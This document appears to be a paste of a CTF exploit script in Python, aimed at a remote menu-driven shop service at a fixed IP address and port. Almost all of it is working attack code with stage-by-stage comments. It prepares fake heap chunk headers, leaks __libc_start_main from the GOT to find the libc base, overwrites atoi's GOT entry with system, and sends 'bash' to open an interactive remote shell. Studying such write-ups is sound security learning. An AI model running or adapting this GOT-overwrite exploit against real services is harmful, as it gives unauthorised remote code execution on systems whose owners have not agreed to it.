angelboy

shaxian.py

Nov 16th, 2015
  1. from pwnpwnpwn import *
  2. import re
  3.  
  4.  
# Target service. The commented pair is a local test VM, kept for reference.
host, port = "180.76.178.48", 23333
# host, port = "10.211.55.16", 8888

# One connection is reused for the whole exploit.
sock = make_conn(host, port)

# GOT slot of atoi in the target binary. It is a fixed address, so the
# script assumes a non-PIE binary (or at least the matching load address).
atoi_got = 0x804b038
  13.  
def create(sock, data, many):
    """Drive menu option 1 ("create") on the remote service.

    Three prompts are answered in order: the menu prompt (ends in ":") gets
    "1", the prompt whose text ends in "5.Jianjiao" gets ``data``, and the
    quantity prompt (ends in "?") gets ``many`` rendered as decimal.
    ``data`` is sent raw, so the caller may embed packed addresses in it;
    ``many`` is whatever the server-side quantity parser will accept.
    Returns nothing -- every effect is on the socket.
    """
    exchanges = (
        (":", "1"),
        ("5.Jianjiao", data),
        ("?", str(many)),
    )
    for prompt, answer in exchanges:
        recvuntil(sock, prompt)
        sendline(sock, answer)
  21.  
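def _parse_cart_price(data):
    """Pull the price out of a cart dump and reinterpret it as an unsigned dword.

    ``data`` is the text received between "Cart:" and "Total". The entry of
    interest is the last line before "Total"; its price is the field after
    the first "*". The service prints that field as a signed 32-bit decimal,
    so negative values are wrapped back into [0, 2**32) to recover the raw
    dword that was read.

    Raises ValueError or IndexError if the dump does not have that shape
    (e.g. the service replied with something other than a cart listing).
    """
    entry = data.split("\n")[-2]
    raw = int(entry.split("*")[1].strip())
    if raw < 0:
        raw += 0x100000000
    return raw


def review(sock):
    """Menu option 4 ("review"): return the price of the last cart entry as u32.

    The main script uses this as its leak primitive: after create() with a
    32-byte name followed by a packed address, the value returned here is
    treated as the dword stored at that address (the mechanism itself is in
    the binary, not visible from this script). Parsing is kept in
    ``_parse_cart_price`` so it can be exercised without a socket.
    """
    recvuntil(sock, ":")
    sendline(sock, "4")
    recvuntil(sock, "Cart:")
    data = recvuntil(sock, "Total")
    return _parse_cart_price(data)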
  31.  
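# ---- Stage 0: seed the profile fields ------------------------------------
# Both fields end in what looks like a fake malloc chunk header
# (prev_size = 0, size = 0x31). Presumably this is heap-layout preparation
# for a later free/overlap; the exact reason is in the binary, not here.
FAKE_CHUNK_HDR = pack32(0) + pack32(0x31)
addr = FAKE_CHUNK_HDR
phone = "a" * 0xf0 + FAKE_CHUNK_HDR

recvuntil(sock, ":")
sendline(sock, addr)
recvuntil(sock, ":")
sendline(sock, phone)

# ---- Stage 1: leak libc through the cart review ---------------------------
# libc offsets. They are specific to the target's libc build and must be
# re-derived for any other libc (0x19970 was a second candidate for
# __libc_start_main in the original script).
LIBC_START_MAIN_OFF = 0x186c0    # __libc_start_main
SYSTEM_OFF = 0x3bf80             # system
LIBC_START_MAIN_GOT = 0x804b034  # GOT slot read back as the entry "price"

# 32 bytes of name followed by the GOT address; review() then reports the
# dword at that address as the entry's price.
payload = "b" * 32 + pack32(LIBC_START_MAIN_GOT)
create(sock, payload, 1)
startmain = review(sock)
libc = startmain - LIBC_START_MAIN_OFF
print("libc : %s" % hex(libc))

# libc is mapped page-aligned, so a misaligned base means the leak or the
# offset is wrong; continuing would only overwrite atoi with garbage.
if libc & 0xfff:
    raise RuntimeError("suspicious libc base %s - check leak/offsets" % hex(libc))

# The address travels through the quantity field, which the service reads
# as a signed 32-bit integer (presumably with atoi, the function hijacked
# below), so anything >= 0x80000000 has to be sent as its negative
# two's-complement decimal.
system = libc + SYSTEM_OFF
system -= 0x100000000

# ---- Stage 2: point an entry at atoi's GOT slot and overwrite it ----------
# Second entry whose name ends in 0x804b1b8 -- a fixed address in the
# binary; its role is not visible from this script.
payload = "c" * 32 + pack32(0x804b1b8)
create(sock, payload, 1)

# Menu option 2 (role not visible here either; kept as in the original).
recvuntil(sock, ":")
sendline(sock, "2")

# Name field: 4 filler bytes, then atoi's GOT address; the quantity
# (system) is what ends up stored there.
payload = "a" * 4 + pack32(atoi_got)
create(sock, payload, system)

# atoi presumably now resolves to system, so the next menu input runs as a
# shell command.
recvuntil(sock, ":")
sendline(sock, "bash")
inter(sock)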